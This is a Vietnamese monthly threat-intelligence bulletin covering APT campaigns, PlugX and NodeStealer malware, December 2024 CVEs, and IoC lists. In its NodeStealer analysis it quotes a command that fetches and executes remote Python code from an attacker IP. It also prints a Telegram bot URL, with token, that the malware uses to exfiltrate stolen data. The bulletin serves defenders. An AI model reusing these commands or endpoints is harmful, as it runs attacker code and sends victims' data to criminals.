Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs
1 CÁC MỐI ĐE DỌA NÂNG CAO – ADVANCED THREATS
Trong tháng 12/2024, đội ngũ NCS ghi nhận các chiến dịch tấn công APT đáng chú ý sau:
STT |
Tên chiến dịch | Mô tả |
1 | Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á | – Mục tiêu: các lĩnh vực như chính phủ, hàng không, viễn thông….
– Phạm vi/ khu vực: Đông Nam Á – Công cụ/cách thức tấn công: sử dụng nhiều công cụ open source và living-off-the-land (LOTL) tools – Mục tiêu chính: thu thập các thông tin tình báo |
2 | CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc | – Phạm vi/ khu vực: Việt Nam và Trung Quốc
– Công cụ/cách thức tấn công: CleverSoar Malware, triển khai thêm các thành phần khác bao gồm Winos4.0 framework, rootkit Nidhogg và custom backdoor. |
3 | Chiến dịch email phishing nhằm đánh cắp thông tin đăng nhập | – Mục tiêu: nhân viên của các doanh nghiệp và tổ chức thuộc các lĩnh vực bao gồm chính phủ, hàng không vũ trụ, tài chính, năng lượng, viễn thông …
– Phạm vi/ khu vực: 15 khu vực trên toàn thế giới trong đó có Việt Nam – Công cụ/cách thức tấn công: Khởi tạo truy cập thông qua email phishing, tận dụng các tên miền đáng tin cậy như Adobe.com nhằm vượt qua cơ chế bảo mật và đánh cắp thông tin đăng nhập |
4 | Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading | – Mục tiêu: các quan chức chính phủ
– Phạm vi/ khu vực: Thái Lan – Công cụ/cách thức tấn công: sử dụng kỹ thuật DLL side-loading nhằm phát tán mã độc có tên Yokai |
5 | Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi | – Mục tiêu: người dùng có nhu cầu vay tiền
– Phạm vi/ khu vực: Nam Mỹ, Đông Nam Á và Châu Phi. – Công cụ/cách thức tấn công: Phần mềm độc hại SpyLoan, kẻ tấn công sử dụng kỹ nghệ xã hội nhằm lừa người dùng cung cấp thông tin nhạy cảm, cấp quyền cho ứng dụng…
|
Thông tin chi tiết các chiến dịch:
1.1 Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á
Các nhà nghiên cứu phát hiện chiến dịch gián điệp nhắm mục tiêu vào các tổ chức bao gồm nhiều lĩnh vực khác nhau như chính phủ, hàng không, viễn thông…. khu vực Đông Nam Á. Các cuộc tấn công diễn ra ít nhất từ tháng 10/2023 sử dụng nhiều công cụ open source và living-off-the-land (LOTL) tools với mục tiêu chính là thu thập các thông tin tình báo.
Cuộc tấn công sử dụng công cụ truy cập từ xa kết hợp với Impacket để thực thi lệnh qua WMI (Windows Management Instrumentation), sau đó cài đặt keylogger, password collectors, reverse proxy tools (Rakshasa, Stowaway, ReverseSSH) để duy trì kết nối với cơ sở hạ tầng do kẻ tấn công kiểm soát. Ngoài ra, kẻ tấn công cũng cài đặt các file DLL cho phép chặn thông tin đăng nhập.
Trong quá trình thực hiện, kẻ tấn công duy trì quyền truy cập kéo dài trong nhiều tháng, tập trung vào việc thu thập thông tin đăng nhập bao gồm mật khẩu, mapping network để xác định hệ thống. Việc trích xuất dữ liệu được thực hiện thông qua nhiều kỹ thuật bao gồm thu thập các tệp bằng WinRAR, nén thành các tệp lưu trữ được bảo vệ bằng mật khẩu. Sau đó upload lên các dịch vụ lưu trữ như File.io, cho phép kẻ tấn công trích xuất dữ liệu.
Một số công cụ được sử dụng trong các cuộc tấn công:
- Dismap: là công cụ open sourceđược phát triển bằng ngôn ngữ Golang, có khả năng nhận dạng thông tin web fingerprint như web/tcp/udp và các asset type liên quan đến domain mục tiêu
- io exfiltration: sau khi dữ liệu được thu thập sẽ trích xuất đến trang web file-sharing hợp pháp file.io
- Impacket: là công cụ open sourceviết bằng ngôn ngữ Python, chứa một số công cụ để thực hiện dịch vụ từ xa, trích xuất thông tin xác thực Windows…
- Infostealer: Công cụ thu thập thông tin tạo ra một thư mục ẩn AppCache và file dat trong C:\Users\[CURRENT USER]\AppData\Local\Microsoft\Windows\AppCache\AppCache.dat. Sau đó mã hóa và ghi lại các thông tin thu thập vào AppCache.dat.
- Inveigh: công cụ machine-in-the-middle được sử dụng để thực hiện các cuộc tấn công giả mạo, thu thập thông tin xác thực và mã hash.
- Keylogger: kẻ tấn công cài đặt file DLL cho phép chặn thông tin đăng nhập từ người dùng
- Living off the land
- PowerShell: Microsoft scripting tool được sử dụng để thực thi lệnh, download payload, tiến hành reconnaissance hệ thống
- exe: được sử dụng để chỉnh sửa registry của máy cục bộ hoặc từ xa
- WMI (Windows Management Instrumentation): sử dụng để thực thi câu lệnh trên máy tính từ xa
- Rakshasa: công cụ proxy được viết bằng ngôn ngữ Go, công cụ này dành cho multi-level proxy và được Earth Baku sử dụng trước đó.
- SharpNBTScan: được viết bằng ngôn ngữ C#, công cụ này trước đây được nhóm APT Trung Quốc gọi là Fireant (hay còn gọi là Mustang Panda, APT31, Stately Taurus) sử dụng.
- WinRAR: sử dụng để lưu trữ hoặc nén các tệp
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục: Danh sách IoCs liên quan đến các chiến dịch tấn công
1.2 CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc
Gần đây, NCS Threat Intel ghi nhận bài viết trên blog của các nhà nghiên cứu thuộc Rapid7 với nội dung phát hiện một trình cài đặt độc hại (malware installer) tinh vi và khó phát hiện, nhắm tới người dùng ở Việt Nam và Trung Quốc. Mã độc triển khai thêm các thành phần khác bao gồm Winos4.0 framework, rootkit Nidhogg và custom backdoor. Các thành phần này cho phép ghi lại thao tác bàn phím, trích xuất dữ liệu, lẩn tránh các biện pháp bảo mật. Phân tích của Rapid7 cho thấy một chiến dịch tập trung vào kiểm soát và đánh cắp dữ liệu, nhấn mạnh tính chất tinh vi của nhóm tấn công.
Chi Tiết Kỹ Thuật
Các tệp độc hại được triển khai (drop) thông .msi package tại đường dẫn “C:\Program Files (x86)\WindowsNT\” bao gồm các payload và tệp thực thi Update.exe. Installer sẽ kiểm tra tự tồn tại của thư mục C:\cs và quyền thực thi, mã độc có thể sử dụng “runas” thông qua ShellExecuteA để thực thi với quyền quản trị viên.
Mã độc CleverSoar sử dụng đa dạng kỹ thuật nhằm kiểm tra cũng như lẩn tránh sự phát hiện và đảm bảo cho quá trình thực thi thành công, bao gồm:
– Phát hiện thực thi trong môi trường ảo hóa bằng cách truy xuất SMBIOS firmware
– Xác định các trình giả lập của Windows Defender thông qua các hàm LdrGetDllHandleEx và RtlImageDirectoryEntryToData
– Thay đổi policy ‘Signatures restricted (Microsoft only)’, cho phép thực thi các tệp tin không có chữ ký
– Các kỹ thuật anti-debug như Timing (GetTickCount64), IsDebuggerPresent
– Kiểm tra tên người dùng trên máy, nếu khớp với một số tên người dùng mặc định hay được sử dụng trong môi trường phân tích, thử nghiệm, sandbox(CurrentUser, Sandbox, Emily, HAPUBWS, Hone Lee, IT-ADMIN,…), mã độc sẽ chấm dứt quá trình thực thi
– Một đặc tính của mã độc là kiểm tra ngôn ngữ đang sử dụng trong hệ thống và chỉ thực thi khi khớp với các ngôn ngữ này, chỉ thực thi nếu ngôn ngữ giao diện người dùng khớp với tiếng Trung (ID: 0x804, 0xC04, 0x1404, 0x1004) hoặc tiếng Việt (ID: 0x42A).
Sau khi vượt qua tất cả các bước kiểm tra, installer xác định sự hiện diện của dịch vụ có tên CleverSoarInst. Nếu không có tên dịch vụ này trong hệ thống, mã độc tạo một dịch vụ tạm thời sử dụng pipename có tên \\.\pipe\ntsvcs thông qua RPC nhằm thiết lập dịch vụ CleverSoar, trỏ tới tệp độc hại tProtect.dll nằm tại đường dẫn “C:\Program Files (x86)\Windows NT”. Dịch vụ này được cấu hình để tự động khởi động và sẽ hoạt động như một thành phần của kernel.
MITRE ATT&CK
Tatic |
Technique | Procedure |
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools |
Defense Evasion | T1218.007 | System Binary Proxy Execution: Msiexec |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Privilege Escalation | T1134.002 | Access Token Manipulation: Create Process with
Token |
Privilege Escalation | T1543 | Access Token Manipulation: Create Process with
Token |
Discovery | T1614.001 | Exploitation for Client Execution |
Discovery | T1082 | System Information Discovery |
Command and Control | T1105 | Ingress Tool Transfer |
Exfiltration |
T1041 |
Exfiltration Over Command-and-Control Channel |
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công
1.3 Chiến dịch email phishing nhằm đánh cắp thông tin đăng nhập
Các nhà nghiên cứu của Group IB phát hiện chiến dịch email phishing nhắm vào nhân viên của các doanh nghiệp và tổ chức từ 15 khu vực trên toàn thế giới, thuộc các lĩnh vực bao gồm chính phủ, hàng không vũ trụ, tài chính, năng lượng, viễn thông …
Vector ban đầu, kẻ tấn công gửi email phishing chứa link độc hại đến mục tiêu, giả mạo các nền tảng tin cậy được sử dụng để quản lý tài liệu và chữ ký điện tử như DocuSign, lừa người dùng nhấp vào link độc hại để xem hoặc ký tài liệu.
Ngoài ra, với cách tiếp cập tinh vi hơn, kẻ tấn công tận dụng các tên miền đáng tin cậy như Adobe.com với mục đích bypass Secure Email Gateways (SEG) và spam filters, các công cụ này có chức năng chặn các tên miền đáng ngờ hoặc không xác định.
Dưới đây là một link được nhúng từ indd.adobe.com – một tên miền phụ hợp pháp của Adobe liên kết với Adobe InDesign, được sử dụng để chia sẻ hoặc xem trước các tệp InDesign trực tuyến. Kẻ tấn công sử dụng tên miền đáng tin cậy để tăng tính hợp pháp nhằm lừa người dùng và vượt qua các cơ chế bảo mật tự động, với mục đích đánh cắp thông tin đăng nhập.
Sau khi nhấp vào liên kết độc hại, nạn nhân được điều hướng đến một trang web phishing được thiết kế tinh vi bao gồm các yếu tố thương hiệu và biểu mẫu đăng nhập được nhập sẵn địa chỉ email của nạn nhân. Khi người dùng nhập mật khẩu, kẻ tấn công sẽ có quyền truy câp trái phép vào các thông tin thương mại nhạy cảm.
Dữ liệu bị đánh cắp sẽ được chuyển đến kẻ tấn công vớithời gian thực, được trích xuất đến một máy chủ C2 hoặc một bot telegram thông qua API.
Kẻ tấn công sử dụng Javascripts snippet nhằm thu thập và truyền thông tin thu thập được đến máy chủ C2. Đoạn mã sử dụng AJAX POST request được chuyển hướng đến endpoint do kẻ tấn công kiểm soát, dữ liệu được gửi bao gồm email và mật khẩu của nạn nhân. Ngoài ra, URL Command-and-Control (C2) được che giấu bằng cách mã hoá dưới dạng hexadecimal hoặc Base64 khiến các công cụ bảo mật khó phát hiện trong quá trình phân tích tĩnh. Khi thực thi, URL mã hoá được giải mã để thực hiện việc trích xuất thông tin của người dùng đến máy chủ của kẻ tấn công.
Trường hợp dữ liệu đánh cắp được truyền đến bot telegram thông qua APT. Sau khi nạn nhân gửi thông tin xác thực, trang phishing sẽ khởi tạo request POST tới ttps://api.telegram.org/bot<token>/sendMessage. Thông tin đánh cắp được gửi dưới dạng message payload đến kẻ tấn công thông qua API telegram, cho phép nhận thông tin theo thời gian thực.
Dựa trên nhật ký lịch sử bot Telegram cho thấy thông tin đăng nhập thu được bao gồm nhiều địa chỉ email doanh nghiệp thuộc nhiều thương hiệu và quốc gia khác nhau trên thế giới.
1.4 Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading
Các nhà nghiên cứu phát hiện chiến dịch nhắm vào các quan chức chính phủ Thái Lan sử dụng kỹ thuật DLL side-loading nhằm phát tán mã độc có tên Yokai.
Kẻ tấn công sử dụng file RAR bao gồm 2 tệp LNK shortcut file được viết bằng tiếng Thái. Khi click vào shortcut files sẽ kích hoạt sao chép nội dung từ ADS (alternate data stream) có tên file.exf vào các tệp mồi nhử (decoy) PDF và Word sử dụng esentutl. Đây là tệp nhị phân windows thường bị lạm dụng để truyền dữ liệu độc hại từ các luồng dữ liệu thay thế.
Sau quá trình sao chép, các tệp shortcut file sẽ mở những tệp mồi nhử (decoy)
Tệp shortcut file có phần mở rộng DOCX chứa: “file.exf” được dùng để tạo tài liệu giả mạo và “file.ext” chứa mã độc. Payload độc hại được sao chép vào tệp thực thi có tên “file.exe” bằng esentutl. Nếu thành công, command prompt sẽ khởi chạy “file.exe” bằng lệnh start.
Khi file.exe thực thi, drop 3 file vào đường dẫn thư mục C:\ProgramData\police bao gồm một tệp nhị phân hợp pháp liên quan đến ứng dụng iTop Data Recovery (“IdrInit.exe”), một DLL độc hại (“ProductStatistics3.dll”) và một tệp IdrInit.exe.data chứa thông tin được gửi bởi C2.
Nếu Idrlnit.exe được thực thi với tư cách là người dùng, Yokai backdoor sẽ tạo một task schedule MicrosoftTSUpdate để thực thi Idrlnit.exe sau mỗi 5 phút. Trong trường hợp được thực thi với tư cách quản trị, sẽ tạo ra một bản sao của chính nó. Để ngăn không cho chạy nhiều lần trên một máy, backdoor sẽ kiểm tra sự tồn tại của mutex có tên “Mutex_Local_Windows_1547”. Nếu mutex đã tồn tại, sẽ dừng hoạt động, nếu không sẽ tạo tệp mutex. Mã độc thường sử dụng mutex như 1 cơ chế để tránh thực thi trùng lặp trên máy chủ.
MITRE ATT&CK
Tactic | Technique |
TA0002: Execution | T1053: Scheduled Task/Job
T1559: Inter-Process Communication |
TA0005: Defense Evasion | T1564.004: Hide Artifacts: NTFS File Attributes
T1036: Masquerading T1574.002: Hijack Execution Flow: DLL Side-Loading T1480.002: Execution Guardrails: Mutual Exclusion |
TA0011: Command and Control | T1071.001: Application Layer Protocol: Web Protocols
T1573.001: Encrypted Channel: Symmetric Cryptography |
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công
1.5 Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi
Các nhà nghiên cứu của McAfee cho biết sự gia tăng đáng kể của SpyLoan – ứng dụng cho vay tiền trên phạm vi toàn cầu. Các ứng dụng này sử dụng các kỹ nghệ xã hội nhằm lừa người dùng cung cấp các thông tin nhạy cảm và cấp thêm quyền cho ứng dụng di động, có thể dẫn đến tống tiền, quấy rối…
Một bộ 15 ứng dụng phần mềm độc hại SpyLoan Android mới với hơn 8 triệu lượt cài đặt đã được phát hiện trên Google Play, chủ yếu nhắm vào người dùng từ Nam Mỹ, Đông Nam Á và Châu Phi.
Tên ứng dụng | Số lượt tải | Quốc gia |
Préstamo Seguro-Rápido, seguro | 1 triệu | Mexico |
Préstamo Rápido-Credit Easy | 1 triệu | Colombia |
ได้บาทง่ายๆ-สินเชื่อด่วน | 1 triệu | Senegal |
RupiahKilat-Dana cair | 1 triệu | Senegal |
ยืมอย่างมีความสุข – เงินกู้ | 1 triệu | Thái Lan |
เงินมีความสุข – สินเชื่อด่วน | 1 triệu | Thái Lan |
KreditKu-Uang Online | 500.000 | Indonesia |
Dana Kilat-Pinjaman kecil | 500.000 | Indonesia |
Cash Loan-Vay tiền | 100.000 | Việt Nam |
RapidFinance | 100.000 | Tanzania |
PrêtPourVous | 100.000 | Senegal |
Huayna Money – Préstamo Rápido | 100.000 | Peru |
IPréstamos: Rápido Crédito | 100.000 | Chile |
ConseguirSol-Dinero Rápido | 100.000 | Peru |
ÉcoPrêt Prêt En Ligne | 50.000 | Thái Lan |
Các ứng dụng cho vay được thiết kế bắt chước các tổ chức tài chính uy tín với logo và giao diện tương tự. Để tiếp cận người dùng, kẻ tấn công đã chạy quảng cáo giả mạo các tổ chức uy tín trên các nền tảng mạng xã hội với lãi suất thấp và không yêu cầu thế chấp.
Sau khi nạn nhân cài đặt ứng dụng, người dùng sẽ được xác thực thông qua OTP ( one-time password) để xác định thiết bị và người dùng trong một khu vực. Ứng dụng yêu cầu quyền truy cập tin nhắn SMS, lịch sử cuộc gọi, danh bạ và camera. Khi người dùng cấp phép, ứng dụng sẽ thu thập các dữ liệu nhạy cảm như thông tin nhận dạng cá nhân, dữ liệu tài khoản ngân hàng, dữ liệu thiết bị …
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến các chiến dịch tấn công
Khuyến nghị:
- Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống
2 MALWARE
Đội ngũ NCS ghi nhận các phân tích đáng chú ý về các mẫu mã độc sau:
STT | Tiêu đề | Mô tả |
1 | Cơ sở hạ tầng mới liên quan đến mã độc PlugX | Thông qua phân tích phát hiện các kết nối từ khu vực Việt Nam tới cơ sở hạ tầng của PlugX |
2 | Mã độc NodeStealer | NodeStealer mã độc đánh cắp dữ liệu, nhắm tới tài khoản Facebook Ads Manager |
2.1 Các phát hiện mới liên quan đến mã độc PlugX
Đội ngũ Threat Intel NCS ghi nhận 3 domains mới là C2 server được cấu hình trong các biến thể của mã độc PlugX cùng với 3 máy chủ nghi ngờ được nhóm tấn công sử dụng để quản trị cơ sở hạ tầng (administration Server).
Domain | Địa chỉ IP | Loại |
howtotopics[.]com | 116.206.178.34 | C2 PlugX |
thelocaltribe[.]com | 45.32.105.184 | |
councilofwizards[.]com | 146.66.215.19 | |
N/A | 115.61.168.143 | Administration Servers |
N/A | 115.61.169.139 | |
N/A | 182.114.110.170 |
Phát hiện nhiều tệp tin độc hại được sử dụng bởi nhóm tấn công, với cách thức lây nhiễm thông qua MSC nhằm tải xuống và thực thi tệp tin MSI Adobe-Setup.msi. Tệp tin drop ra 3 files: tệp tin thực thi imecnt.exe, loader DLL và encrypt payload officeime.dat. Địa chỉ C2 được cấu hình trong Plugx là 116.206[.]178.67. Ngoài ra, imecnt.exe cũng được ghi nhận từng được sử dụng để load mã độc ShadowPad trong chiến dịch tấn công khu vực Đông Nam Á. Trong số các IP theo dõi, phát hiện một số địa chỉ IP của nhiều quốc gia trong đó có Việt Nam có các kết nối đến địa chỉ C2 của PlugX 103[.]238.227[.]183, 3.238.225[.]248.
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến mã độc
2.2 Mã độc NodeStealer
Thông qua email phishing, nhóm tấn công lừa người dùng tải xuống tệp tin định dạng .zip độc hại, sử dụng tệp tin PDF reader thực hiện sideload tệp tin độc hại oledlg.dll. DLL sau đó sẽ thực thi các tệp tin batch file tại đường dẫn “images\active-license.bat” sử dụng cmd.exe. Batch file chứa đoạn encoded powershell sẽ được thực thi thông qua powershell
Powershell thực hiện:
- Thiết lập giao diện console ở chế độ ẩn
- Tạo thư mục tại đường dẫn %LocalAppData%\ChromeApplication
- Giải nén license.rar file tới đường dẫn %LocalAppData%\ChromeApplication
- Tải xuống và mở tài liệu PDF giả mạo (decoy) tại đường dẫn %User Profile%\document.pdf thông qua command “C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe” “C:\Users\%User Profile%\document.pdf”
- Thiết lập persistence thông qua startup-folder
- Download và thực thi payload cuối thông qua command “cmd “/C start “” “%LOCALAPPDATA%\ChromeApplication\synaptics.exe” -c “import requests;exec(requests.get(‘ http[://]88.216.99.5:15707/entry.txt’), verify=False).text)”
entry.txt được lưu trữ trên remote host là obfuscate Python script, sử dụng native python exec() và marsha.loads() để load và thực thi Python bytecode. Dữ liệu sẽ được giải mã thông qua hàm hybrid_decrypt, lưu trong biến code và truyền tới hàm runner để thực thi
Dữ liệu trong biến code được thiết kế như infostealer, thu thập thông tin thẻ cùng các thông tin khác của người dùng lưu trữ ở các trình duyệt web. Ngoài thu thâp và đánh cắp thông tin, chiến dịch nhắm đến các tài khoản Facebook Ads Manager. Các dữ liệu sau đó được nén định dạng zip và đánh cắp thông qua Telegram
- https[://]api[.]telegram[.]org/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI/sendDocument
- Chat-id ‘-1002426006531’ hoặc ‘-1002489276039’.
Tham khảo: https://www.trendmicro.com/en_vn/research/24/l/python-based-nodestealer.html
Indicator of Compromises (IoCs)
Chi tiết xem tại Phụ lục:Danh sách IoCs liên quan đến mã độc
Khuyến nghị:
- Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống
3 LỖ HỔNG BẢO MẬT
3.1 Microsoft Patch Tuesday –December 2024
Trong tháng 12, Microsoft đã phát hành các bản vá cho 71 CVE mới trong các sản phẩm của Windows và Windows Components, Office và Office Components, SharePoint Server, Hyper-V, Defender for Endpoint, và System Center Operations Manager. Trong đó có 16 lỗ hổng được đánh giá mức độ Critical, 54 lỗ hổng được đánh giá là Important, 1 lỗ hổng được đánh giá Moderate.
Các lỗ hổng nổi bật ghi nhận trong tháng:
STT |
Mã CVE |
Tên lỗ hổng | Thông tin chung | Mức độ cảnh báo |
1 |
CVE-2024-49138 |
Windows Common Log File System Driver Elevation of Privilege Vulnerability | Tồn tại lỗ hổng leo thang đặc quyền trên Windows Common Log File System Driver cho phép kẻ tấn công giành được đặc quyền SYSTEM | Important |
2 |
CVE-2024-49112 |
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | Tồn tại lỗ hổng thực thi mã từ xa trên Windows Lightweight Directory Access Protocol (LDAP) cho phép kẻ tấn công không cần xác thực thực thi mã tùy ý thông qua một tập hợp lệnh call LDAP độc hại | Critical |
3 |
CVE-2024-49117 |
Windows Hyper-V Remote Code Execution Vulnerability | Tồn tại lỗ hổng thi mã từ xa trên Windows Hyper-V cho phép kẻ tấn công gửi các request độc hại đến hardware resources trên VM, dẫn đến thực thi mã từ xa trên host server. Khai thác lỗ hổng yêu cầu xác thực | Critical |
4 |
CVE-2024-49063 |
Microsoft/Muzic Remote Code Execution Vulnerability | Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft/Muzic. | Important |
5 |
CVE-2024-49068 |
Microsoft SharePoint Elevation of Privilege Vulnerability | Tồn tại lỗ hổng leo thang đặc quyền trên Microsoft SharePoint cho phép kẻ tấn công chiếm được quyền của người dùng bị xâm phạm. | Important |
6 |
CVE-2024-49070 |
Microsoft SharePoint Remote Code Execution Vulnerability | Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft SharePoint. Khai thác lỗ hổng yêu cầu kẻ tấn công cần chuẩn bị môi trường mục tiêu. | Important |
Khuyến nghị:
- Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
STT |
Mã CVE | Tên lỗ hổng | Thông tin chung | Sản phẩm | Mức độ cảnh báo |
1 | CVE-2024-42327 | SQL injection in user.get API | Tồn tại lỗ hổng SQL Injection trong user.get API trên Zabbix cho phép bất kỳ người dùng không phải quản trị viên có quyền truy cập API, bao gồm cả vai trò mặc định “User”. Kẻ tấn công có thể sử dụng lỗ hổng này để leo thang đặc quyền | Zabbix | Critical |
2 | CVE-2024-42330 | Internal strings in HTTP headers | Tồn tại lỗ hổng thực thi mã từ xa trên Zabbix bắt nguồn từ việc mã hóa không đúng cách các HTTP headers trong HttpRequest object, cho phép kẻ tấn công tạo các request độc hại dẫn đến thực thi mã từ xa. | Zabbix | High |
3 | CVE-2024-42448 | Critical RCE Vulnerability in Veeam VSPC | Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên VSPC server. | Veeam Service Provider Console | Critical |
4 | CVE-2024-40717 | A vulnerability allows an authenticated user execute a script with elevated privileges | Tồn tại lỗ hổng cho phép kẻ tấn công có vai trò nhất định trong Users and Roles settings trên backup server thực thi tập lệnh với đặc quyền nâng cao bằng cách cấu hình tập lệnh đó thành pre-job hoặc post-job task. Khai thác lỗ hổng yêu cầu xác thực. | Veeam Backup & Replication | High |
5 | CVE-2024-42451 | Low-privileged users to leak all saved credentials in plaintext | Tồn tại lỗ hổng cho phép truy cập tất cả các thông tin xác thực dưới dạng bản rõ (plaintext) dẫn đến lộ lọt dữ liệu nhạy cảm, có thể được kẻ tấn công sử dụng cho các cuộc tấn công khác | Veeam Backup & Replication | High |
6 | CVE-2024-53247 | Remote Code Execution through Deserialization of Untrusted Data in Splunk Secure Gateway app | Tồn tại lỗ hổng trong Splunk Secure Gateway cho phép kẻ tấn công thực thi mã từ xa. | Splunk Secure Gateway | High |
7 | CVE-2024-11639 | Authentication Bypass in the admin web console of Ivanti CSA | Tồn tại lỗ hổng bỏ qua xác thực trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công không cần xác thực giành được quyền truy cập admin | Ivanti Cloud Services Application | Critical |
8 | CVE-2024-11772 | Command injection in the admin web console of Ivanti CSA | Tồn tại lỗ hổng Command injection trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực. | Ivanti Cloud Services Application (CSA) | Critical |
9 | CVE-2024-11773 | SQL injection in the admin web console of Ivanti CSA | Tồn tại lỗ hổng SQL injection trong admin web console trên Ivanti CSA phiên bản trước 5.0.3 cho phép kẻ tấn công với đặc quyền admin thực thi câu lệnh SQL tùy ý. Khai thác lỗ hổng yêu cầu xác thực. | Ivanti Cloud Services Application (CSA) | Critical |
10 | CVE-2024-11633 | Argument injection in Ivanti Connect Secure | Tồn tại lỗ hổng argument injection trong Ivanti Connect Secure phiên bản trước 22.7R2.4 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực | Ivanti Connect Secure | Critical |
11 | CVE-2024-11634 | Command injection in Ivanti Connect Secure and Ivanti Policy Secure | Tồn tại lỗ hổng Command injection trong Ivanti Connect Secure phiên bản trước 22.7R2.4 và Ivanti Policy Secure phiên bản trước 22.7R1.2 cho phép kẻ tấn công với đặc quyền admin thực thi mã từ xa. Khai thác lỗ hổng yêu cầu xác thực. | Ivanti Connect Secure & Policy Secure | Critical |
12 | CVE-2024-53677 | File upload logic vulnerability in Apache Struts | Tồn tại lỗ hổng trong Apache Struts cho phép kẻ tấn công upload file độc hại, từ đó thực thi mã từ xa. | Apache Struts | Critical |
13 | CVE-2024-50379 | Remote Code Execution via write enabled Default Servlet | Tồn tại lỗ hổng trong Apache Tomcat cho phép kẻ tấn công thực thi mã từ xa trên các hệ thống file không phân biệt chữ hoa chữ thường (case insensitive) khi servlet mặc định được cấu hình write-enabled (không phải cấu hình mặc định). Việc tải lên (upload) và đọc (read) đồng thời cùng 1 tệp có thể bỏ qua các kiểm tra bảo mật, khiến tệp tải lên được coi như JSP dẫn đến thực thi mã từ xa | Apache Tomcat | Important |
Khuyến nghị:
- Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống
4 PHỤ LỤC
Danh sách các IoC liên quan đến các mã độc/ chiến dịch tấn công mới xuất hiện trong tháng 12/2024.
4.1 Danh sách IoCs liên quan đến các chiến dịch tấn công
4.1.1 Chiến dịch gián điệp nhắm vào các tổ chức khu vực Đông Nam Á
Indicators of Compromise
Hash SHA256
d312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194 – Stowaway
e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Batch file loader
33cb9f06338a9ea17107abbdc478071bbe097f80a835bbac462c4bb17cd0b798 – PlugX loader
8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa – Keylogger
89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e – Keylogger
9fe3ff51443c41fe0be01a55a3a5fbfb261bcf63b3b0cd67f65a2c00a6d52ff3 – Keylogger
e6cecba25abd092bfccba825298edecd2fdee6c428d9ae85399fabc54355e31f – Keylogger loader
779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd – ReverseSSH
e9572549b2f35f32861ffc9be160e9c8f86e4d9d3dd43c3727f0df4dc2acc944 – Infostealer
e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Credential-dumping tool
b7472c6f6cba47ec85fa147c78f3a7a40a4fc5913fe41654ab499a7b1bd4ea2e – Batch file used to register custom DLL to hook into Windows authentication mechanisms
3e4d86c4e1d463b99478f960c9c00f7d11cd0d1fb8dd2948e8340b7bc3550904 – Batch file used to register custom DLL to hook into Windows authentication mechanisms
fb603072418da9150673ac9826a46a2b2462c8fc0afeacb2034ecb2b7d666001 – Batch file used to register custom DLL to hook into Windows authentication mechanisms
340e872c814d221989ca2cb93819b9ad307572851b5b3f8bfcf791ff08e0e677 – Suspicious Windows script file
80c3effc8f017b26c549bed8ba82097a6be7a59e383dd35adc917bf661e0a754 – Windows script file that drops SharpGPOAbuse and Rakshasa
9b1794a1c8c59631d95178c7c4e2f5917b84864b342b4cfdab8f0990c3dbf5d2 – FastReverseProxy
ca0eeb4b71d4124dec785a9492970e9b1cfaa4cab0e8ca4486fc14b2e256d7f7 – Inveigh
d7b85b92fb185272b89a7ff27424bff22a5a6542f6bde9838482aa9f87979828 – Dismap
fa6de0d0bc9d83a3942aa8b3a12a5924dc662bec32cb3c2f212a0a0c0a4ebc7a – SharpNbtscan
10029f14f2718362144b0e9b660994e8fb944af9ce9fcff04925f8b0615bb509 – SharpGPOAbuse
aa096f18e712ac0604e18d16441b672fcb393de9edf3ff4393519c48ab26a158 – Rakshasa
